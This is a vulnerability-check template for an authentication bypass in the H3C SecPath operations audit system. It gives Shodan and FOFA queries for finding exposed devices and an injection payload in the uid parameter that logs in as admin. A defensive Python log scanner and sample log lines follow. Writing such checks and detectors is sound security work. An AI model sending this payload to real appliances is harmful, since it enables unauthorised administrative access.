Vulnerability description
The H3C server could be accessed without any authentication.
SHODAN: http.html:"H3C-SecPath-运维审计系统"
FOFA: app="H3C-SecPath-运维审计系统" && body="2018"
id: h3csecparh-unauthorized-login

info:
  name: H3C Server - Unauthenticated Access
  author: Print1n(http://print1n.top)
  severity: high
  description: |
    H3C server was able to be accessed with no authentication requirements in place.
    SHODAN: http.html:"H3C-SecPath-运维审计系统"
    FOFA: app="H3C-SecPath-运维审计系统" && body="2018"
  tags: h3c,default-login,unauth
  created: 2023/06/17

rules:
  r0:
    request:
      # The request carries no credentials or session cookie
      method: GET
      path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
    # Body markers checked: '错误的id' ("wrong id"), '审计管理员' ("audit administrator") and 'admin'
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'错误的id') &&
      response.body.bcontains(b'审计管理员') &&
      response.body.bcontains(b'admin')
expression: r0()
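For defenders, the request in rule r0 leaves a recognizable trace in web access logs. The following added example (not part of the template or of any H3C tooling) flags log lines that hit the same endpoint with code-like content in `uid`; the combined log format, the regex heuristic, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

AUDIT_PATH = "/audit/gui_detail_view.php"  # endpoint requested by rule r0
# Assumed heuristic: code-like tokens or CR/LF have no place in a uid value.
SUSPICIOUS = re.compile(r"chr\s*\(|\bprint\b|[\r\n]", re.I)
# Request and status fields of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return None, 'attempt' or 'attempt-200' for one access log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path.lower() != AUDIT_PATH:
        return None
    # parse_qs percent-decodes values, so %0d%0a and %2b are seen decoded.
    uid = " ".join(parse_qs(url.query, keep_blank_values=True).get("uid", []))
    if not SUSPICIOUS.search(uid):
        return None
    # Rule r0 requires status 200, so a 200 here deserves priority review.
    return "attempt-200" if m.group("status") == "200" else "attempt"

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
PROBE = ("/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:"
         "%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin")
SAMPLE_LOG = [
    f'192.0.2.10 - - [17/Jun/2023:10:00:01 +0000] "GET {PROBE} HTTP/1.1" 200 5120',
    f'192.0.2.11 - - [17/Jun/2023:10:00:05 +0000] "GET {PROBE} HTTP/1.1" 302 0',
    '198.51.100.7 - - [17/Jun/2023:10:01:00 +0000] "GET /audit/gui_detail_view.php?id=7&uid=12 HTTP/1.1" 200 900',
    '198.51.100.7 - - [17/Jun/2023:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

A 200 verdict only shows that the appliance answered the request; confirming exposure still requires checking the response body markers listed in rule r0.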